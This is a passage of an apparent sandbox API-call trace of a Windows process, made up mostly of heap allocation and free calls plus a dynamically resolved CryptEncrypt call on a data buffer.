hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0210.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b30 [0210.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.325] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0210.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54440 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0210.326] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x5963, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5968) returned 1 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0210.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0210.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.328] CharLowerBuffW (in: lpsz="byte[22888]", cchLength=0xb | out: lpsz="byte[22888]") returned 0xb [0210.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0210.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.329] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0210.330] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0210.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0210.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54238 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0210.331] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f34c68*, pdwDataLen=0x8cef60*=0x5963, dwBufLen=0x5968 | out: pbData=0x2f34c68*, pdwDataLen=0x8cef60*=0x5968) returned 1 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0210.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0210.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0210.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0210.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0210.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0210.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0210.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.336] 